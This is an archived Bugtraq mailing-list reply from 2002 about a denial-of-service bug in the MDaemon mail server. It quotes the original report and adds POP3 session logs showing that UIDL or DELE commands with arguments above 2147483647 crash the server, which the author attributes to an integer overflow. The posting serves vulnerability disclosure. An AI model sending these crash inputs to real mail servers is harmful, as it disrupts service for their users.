RE: MDaemon SMTP/POP/IMAP server DoS
From: Basil Hussain (basil.hussain@kodakweddings.com)Date: 10/29/02
- Previous message: EnGarde Secure Linux: "[ESA-20021029-028] syslog-ng: buffer overflow in macro handling code (UPDATED)"
- In reply to: D4rkGr3y: "MDaemon SMTP/POP/IMAP server DoS"
- Next in thread: Robert Feldbauer: "RE: MDaemon SMTP/POP/IMAP server DoS"
- Next in thread: Karl Pietri: "Re: MDaemon SMTP/POP/IMAP server DoS"
- Reply: Robert Feldbauer: "RE: MDaemon SMTP/POP/IMAP server DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Basil Hussain" <basil.hussain@kodakweddings.com> To: <bugtraq@securityfocus.com> Date: Tue, 29 Oct 2002 10:26:51 -0000
Hi all,
> Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by
> sending long arguments (32b and above) with DELE or UIDL commands.
> To do this u must have at least mail-account on vulnerable host.
> After geting long request from client, all MDaemon's Services will be
> closed (smtp, imap, pop, (?)worldclient).
> Here the log of attack on local MDaemon POP-server:
>
> +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7
> <MDAEMON-F200210
> 271036.AA3656130MD0012@dark.ru>
> USER D4rkGr3y
> +OK D4rkGr3y... Recipient ok
> PASS cool-pass
> +OK D4rkGr3y@dark.ru's mailbox has 1 total messages (18356 octets).
> UIDL 11111111111111111111111111111111
It would appear this is not an issue with the length of string passed to
MDaemon, but rather an integer overflow problem. After some testing, I've
discovered that if you pass any number greater than 2147483647 (the limit
for a signed 4-byte integer), you either get an error or a complete crash of
MDaemon. For example:
+OK somedomain.com POP MDaemon 6.0.5 ready
<MDAEMON-F200210290951.AA5138234MD2795@somedomain.com>
USER blah
+OK blah... Recipient ok
PASS 123456
+OK blah@somedomain.com's mailbox has 0 total messages (0 octets).
UIDL 2147483647
-ERR no such message
UIDL 2147483648
+OK -2147483648 !!! Index 0 is not used
UIDL 2147483649
[Connection lost at this point...]
By the way, you may have noticed this also works with a slightly older
release (6.0.5). Also, hostname and account details have been changed to
protect the guilty... :-)
Also, I don't know whether this was something with how my test W2K server
was set up, but MDaemon would auto-restart afterwards, thus making this bug
not so much of a show-stopper and limiting scope for a Denial-of-Service
attack somewhat.
Regards,
Basil Hussain
- Previous message: EnGarde Secure Linux: "[ESA-20021029-028] syslog-ng: buffer overflow in macro handling code (UPDATED)"
- In reply to: D4rkGr3y: "MDaemon SMTP/POP/IMAP server DoS"
- Next in thread: Robert Feldbauer: "RE: MDaemon SMTP/POP/IMAP server DoS"
- Next in thread: Karl Pietri: "Re: MDaemon SMTP/POP/IMAP server DoS"
- Reply: Robert Feldbauer: "RE: MDaemon SMTP/POP/IMAP server DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
